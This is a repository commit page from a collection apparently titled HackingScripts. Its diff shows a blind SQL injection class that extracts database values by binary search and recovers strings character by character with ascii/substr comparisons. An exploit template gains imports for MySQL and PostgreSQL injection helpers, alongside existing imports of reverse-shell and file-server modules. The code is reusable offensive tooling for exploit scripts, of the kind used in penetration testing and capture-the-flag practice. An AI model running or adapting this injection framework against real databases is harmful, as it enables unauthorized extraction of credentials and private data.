Home Explore Help
Register Sign In
Roman
/
HackingScripts
1
0
Fork 0
Files Issues 0 Pull Requests 0
Browse Source

sqli template

Roman Hergenreder 2 months ago
parent
5a2508e524
commit
4b02f0bf25
2 changed files with 12 additions and 10 deletions
Split View Show Diff Stats
  1. 11 10
      sqli.py
  2. 1 0
      template.py

+ 11 - 10
sqli.py
View File 

@@ -22,7 +22,7 @@ class SQLi(ABC):
 
 
         if not binary_search:
 
             cur_int = 1
 
-            while self.blind_sqli(f"({query})>{cur_int}"):
 
+            while self.blind_sqli(f"({query})>{cur_int}", verbose):
 
                 cur_int += 1
 
 
             return cur_int
 
@@ -30,16 +30,15 @@ class SQLi(ABC):
 
             min_value = 1
 
             max_value = 1
 
 
-            while self.blind_sqli(f"({query})>{max_value}"):
 
+            while self.blind_sqli(f"({query})>{max_value}", verbose):
 
                 min_value = max_value + 1
 
                 max_value = max_value * 2
 
 
-            max_value = max_value - 1
 
             while True:
 
                 cur_int = (min_value + max_value) // 2
 
-                if self.blind_sqli(f"({query})>{cur_int}"):
 
+                if self.blind_sqli(f"({query})>{cur_int}", verbose):
 
                     min_value = cur_int + 1
 
-                elif self.blind_sqli(f"({query})<{cur_int}"):
 
+                elif self.blind_sqli(f"({query})<{cur_int}", verbose):
 
                     max_value = cur_int - 1
 
                 else:
 
                     return cur_int
 
@@ -67,7 +66,7 @@ class SQLi(ABC):
 
             found = False
 
             query = self.build_query(f"ascii(substr({column},{len(cur_str) + 1},1))", table, condition, offset)
 
             for c in charset:
 
-                if self.blind_sqli(f"({query})={ord(c)}"):
 
+                if self.blind_sqli(f"({query})={ord(c)}", verbose):
 
                     found = True
 
                     cur_str += c
 
                     if verbose:
 
@@ -93,20 +92,22 @@ class SQLi(ABC):
 
 
         return rows
 
 
+    # Following methods need to be implemented in the exploit
 
     @abstractmethod
 
-    def get_database_version(self, verbose=False):
 
+    def blind_sqli(self, condition: str, verbose=False) -> bool:
 
         pass
 
 
+    # Following methods will be implemented by MySQLi, PostgreSQLi, ...
 
     @abstractmethod
 
-    def get_current_user(self, verbose=False):
 
+    def get_database_version(self, verbose=False):
 
         pass
 
 
     @abstractmethod
 
-    def get_current_database(self, verbose=False):
 
+    def get_current_user(self, verbose=False):
 
         pass
 
 
     @abstractmethod
 
-    def blind_sqli(self, condition: str, verbose=False) -> bool:
 
+    def get_current_database(self, verbose=False):
 
         pass
 
 
     @abstractmethod

+ 1 - 0
template.py
View File 

@@ -102,6 +102,7 @@ import urllib.parse
 
 from bs4 import BeautifulSoup
 
 from hackingscripts import util, rev_shell
 
 from hackingscripts.fileserver import HttpFileServer
 
+from hackingscripts.sqli import MySQLi, PostgreSQLi
 
 from urllib3.exceptions import InsecureRequestWarning
 
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)